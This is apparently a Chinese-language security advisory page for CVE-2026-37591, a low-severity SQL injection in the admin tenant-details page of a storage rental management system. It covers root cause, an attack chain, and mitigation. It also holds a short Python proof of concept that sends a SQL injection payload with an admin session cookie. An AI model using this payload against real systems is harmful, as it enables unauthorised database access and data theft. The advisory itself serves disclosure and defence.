IPBUF安全漏洞报告
English
CVE-2026-37591 CVSS 2.7 低危

CVE-2026-37591: Sourcecodester存储租赁管理系统SQL注入漏洞

披露日期: 2026-04-14
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-37591
漏洞类型
SQL注入
CVSS评分
2.7 低危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
Sourcecodester Storage Unit Rental Management System

相关标签

SQL注入CVE-2026-37591SourcecodesterWeb安全信息泄露

漏洞概述

Sourcecodester Storage Unit Rental Management System v1.0版本存在SQL注入漏洞。该漏洞位于/storage/admin/tenants/view_details.php文件中,由于应用程序未对用户输入进行严格的过滤和验证,导致攻击者可构造恶意SQL语句并执行。虽然利用该漏洞需要高权限账户,但成功利用后可能导致数据库敏感信息泄露,对系统机密性构成威胁。

技术细节

该漏洞的根本原因在于Sourcecodester Storage Unit Rental Management System在开发过程中未遵循安全编码规范。具体而言,在/storage/admin/tenants/view_details.php页面处理租户详情请求时,程序直接将HTTP请求中的参数(如ID或标识符)拼接到SQL查询语句中,未使用预编译语句(PreparedStatement)或有效的输入过滤机制。攻击者只需拥有管理员级别的高权限账户(PR:H),即可通过网络向量(AV:N)向受影响端点发送包含SQL元字符的恶意数据。由于后端数据库未能正确处理这些字符,攻击者可以篡改查询逻辑,执行任意SQL命令,从而提取数据库中的敏感数据,如用户凭证、租户记录等。

攻击链分析

STEP 1
1. 获取访问权限
攻击者首先需要通过钓鱼、暴力破解或其他手段获取系统的高权限管理员账户凭证,因为该漏洞利用需要高权限(PR:H)。
STEP 2
2. 发送恶意请求
攻击者利用管理员会话,向/storage/admin/tenants/view_details.php接口发送特制的HTTP GET或POST请求,在参数中注入SQL恶意代码(如UNION SELECT或布尔盲注语句)。
STEP 3
3. 执行SQL语句
后端服务器接收请求,将未经过滤的参数直接拼接到SQL查询中并交由数据库执行。数据库解析恶意代码并返回查询结果。
STEP 4
4. 数据泄露
攻击者根据HTTP响应中的差异(如页面内容变化、响应时间延迟或数据库报错信息),推断数据库结构并提取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# Exploit Title: Sourcecodester Storage Unit Rental Management System v1.0 SQL Injection PoC # Date: 2026-04-14 # Vendor: Sourcecodester # Vulnerable File: /storage/admin/tenants/view_details.php import requests def check_sqli(url, cookie): """Check for SQL Injection vulnerability""" # Assuming the vulnerable parameter is 'id' # Payload attempts a time-based blind or error-based injection payload = "?id=1' AND 1=1-- -" full_url = f"{url}/storage/admin/tenants/view_details.php{payload}" headers = { "Cookie": cookie, "User-Agent": "Mozilla/5.0 (PoC-Scanner)" } try: response = requests.get(full_url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Request sent to {full_url}") print(f"[+] Response Length: {len(response.text)}") print("[+] Check application response for database errors or data leakage.") else: print("[-] Exploit failed or endpoint not reachable.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = "http://localhost" # Replace with actual target admin_cookie = "PHPSESSID=admin_session_id" # Requires Admin Privilege check_sqli(target, admin_cookie)

影响范围

Sourcecodester Storage Unit Rental Management System v1.0

防御指南

临时缓解措施
在未修复漏洞前,建议管理员严格限制对管理后台的访问来源IP,加强账户安全策略防止凭证泄露。同时,可在Web服务器层面对/view_details.php参数进行正则匹配拦截,阻止包含单引号、注释符等SQL关键字的请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表